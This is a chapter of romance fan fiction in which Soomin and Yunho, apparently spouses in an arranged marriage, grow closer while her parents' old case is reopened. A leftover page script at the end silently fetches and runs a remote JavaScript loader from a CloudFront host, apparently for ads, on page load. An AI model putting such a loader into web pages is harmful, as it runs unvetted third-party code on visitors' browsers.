Chapter 24

The Will That Changed Their Lives

 

 

Your POV

 

After having an early dinner as soon as I arrived home I immediately went up to my room.

“Yunho hyung…..i think….he’s starting to fall for you~”

I shook my head as Changmin oppa’s voice started echoing in my mind. Why is everyone assuming that Yunho~

No, I must not even think about it. It’s impossible. I haven’t even felt anything. He’s more like another oppa for me, just like Changmin oppa. I sighed.

“Well, I know this wasn’t going to be easy.” I muttered.

Now, they fought because of me. Maybe I shouldn’t be so close with Yunho.

I nodded. That should be the way.

 

Narrator’s POV

 

Yunho arrived home around 9 PM and the whole household was asleep. He already ate with Hyoran. He placed his car keys down and went up. Then he stopped when he was abput to open his door. He looked at Soomin’s door. His brows furrowed.

“Is she even home?” He muttered as he walked to the door.

He knocked once, but no answer came. He opened the door quietly and found Soomin fast asleep with her iPad on her arms. She was lying down on the couch with the television on. Yunho smiled softly and switched the televison off. He took the iPad from her hands and placed it on the table. Yunho lifted her up from the couch and placed her on the bed.

He patted her nose once and placed a blanket on her.

“Good night, wifey.” He grinned as he put off the lamo and went out.

 

Yunho’s POV

 

I woke up only to find the pool empty. I guess Soomin doesn’t feel like swimming. I sat down to drink my coffee.

You’re always on her side, you love her already don’t you?”

What made Hyoran say that? Have I really been paying too much attention to Soomin~

Soomin went down clad in a pair of jeans and a white button down shirt. She was looking for something in her bag.

Is she still mad at me? But I need to talk to her. Is she going out with that Nichkhun again?

“Soomin-ah.”

She looked at me and sat down.

“Are you mad at me?”

“Aniya, I was just…hmmm…disappointed at you. Bad boyfriend.” She grinned as she stood up.

“Are you going somewhere?” I asked, relieved that she wasn’t angry at all.

“Work. First day today, I’ll see you later then.” She waved as she went out.

“…….Take care.”

 

Narrator’s POV

 

Soomin was already doing her rounds when her phone rang.

“Haraboji, waeyo?”

“Are you busy? We’re eating lunch together today.”

“With oppa?” She asked.

“No, with your husband, be there in 11 okay? Don’t be late or else.”

Soomin sighed.

“Fine, I’ll be there.” She replied.

“Great, first day of work, haraboji wants to have lunch with Yunho.”

 

Yunho sat on his desk; he was unable to concentrate on anything. He was deeply bothered. Soomin’s smiling face and Hyoran’s being angry kept on appearing in his mind. He also remembered Khun and Soomin’s interaction he didn’t like it.

“You like her don’t you?”

He spun around and found Yoochun holding a folder.

“The files from the new venture.” He said as he placed them on the desk.

“What do you mean?” Yunho asked.

“Soomin, you’re getting more…attached to her.”

“Chun, it’s just natural~”

“No, I’ve known ever since we were little, you’re not the type who’d get attached easily.”

Yunho furrowed his brows.

“Fix this, settle your feelings. You’re not the only one who’s going to get hurt.”

“I’m sure I still have feelings for Hyo, but Soomin…..”

“She confuses you, doesn’t she?”

Yunho nodded.

“She is the type of girl that you wouldn’t go for, right? Chaebol daughters, but she’s different.” Yoochun replied.

“She’s….so independent.”

Yoochun just nodded and smiled.

 

Soomin was making her way out of the hospital when her phone rang.

“Hello?”

“Hey! I’m back!”

“You’re what? You mean… in..”

“I just landed in Seoul, and lets face it, I at the language~”

“Arasso, arasso, I’ll have someone pick you up. I’m quite busy.”

She dialed her brother’s number.

“Oh, Soomin-ah, wae?”

“Oppa, are you busy?”

“Ani, wae?”

“Its like this…Ailee just arrived at the airport~”

“She can take a taxi.”

“Oppa, she doesn’t speak Korean so well, can you please~”

“Some taxis have translators~”

“Oppa, pretty please? She was the one who looked out for me while I was in Cali.”

There was a long silence on the other end.

“Fine.”

“Thank you oppa, I love you!”

Changmin just grunted and placed the phone down.

 

Your POV

 

I arrived at the restaurant and found her grandfather already talking with Yunho.

“You’re late young lady.”

I just smiled sheepishly and sat down next to Yunho. He just grinned at me. I looked at him; he was wearing his usual corporate look today. I’m not used to it, I usuall just see him at home.

 

Through out the meal, Haraboji just asked us about how we were doing. Then he cleared his throat, I looked up.

“Soomin-ah, your parents’ case~”

I took a sip of water.

“~the city prosector’s office is opening it again.”

“Ne? Waeyo? It’s been….more than ten years already haraboji.” I said. Yunho patted my hand I pulled it away.

“It seems that…..someone spoke up, a witness.”

I furrowed my brows.

“Well, its useless if they talk now~”

“Soomin-ah, just call the office and tell them you were the child in the car. The prosecutor wants to talk to you.”

I flinched. I don’t want to be reminded again.

“…Arassoyo, haraboji.”

 

Narrator’s POV

 

The couple walked the elder Shim to his car. Soomin waved as the car left, then she sighed.

“Are you okay? You seem tired.” Yunho asked.

“I’m…okay, I was just bothered earlier.”

They walked together. Then Yunho grinned at her.

“Have you been around the city yet? Like walking around?”

“No, not yet.”

“Then, lets go.” He grabbed her wrist and they walked out the restaurant.

 

“Where are we going?” Soomin asked, a bit unnerved by Yunho’s hand on hers.

“I’m showing you around the streets of Seoul by foot.” He grinned as they walked towards Myeongdong.

Soomin looked around once they were in. Yunho let go of her hand and watched her as she peeked at things. He just smiled, but then he grew bothered again.

 

“Yunho-ya, whats this called?” Soomin called out. Yunho looked at where she was pointing.

“Oh, these are fish cakes, you want to try?”

Soomin shook her head and just walked forward, Yunho grinned.

“Its not dirty you know.”

“I know, but we just~”

A cyclist came rushing by, Yunho had to pull her by the waist. Soomin’s palms were on his chest and her eyes were closed.

“That was a close one.” Yunho smiled and let her go. Soomin frowned; her heart was beating so fast.

“….Yeah, it was…thanks.”

Yunho just nodded and began walking again.

“About the investigation….what should I do?” Soomin asked.

“Do you want them to go into the case?”

Soomin frowned.

“I’m…..scared, I’m afraid that it….might all come..back to me, the pain and…memories.”

Yunho nodded and just took hold of her hand.

“Well, I’ll help you if you need me. Be strong.” He smiled. Soomin just grinned and gripped his hand briefly.

 

 

++++++++++++++++++++++++++++++++++++++++++++++++++++++

 

exo m or exo k?

hihihihihihi

 

Soominnie, what is this? i sense something...


if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};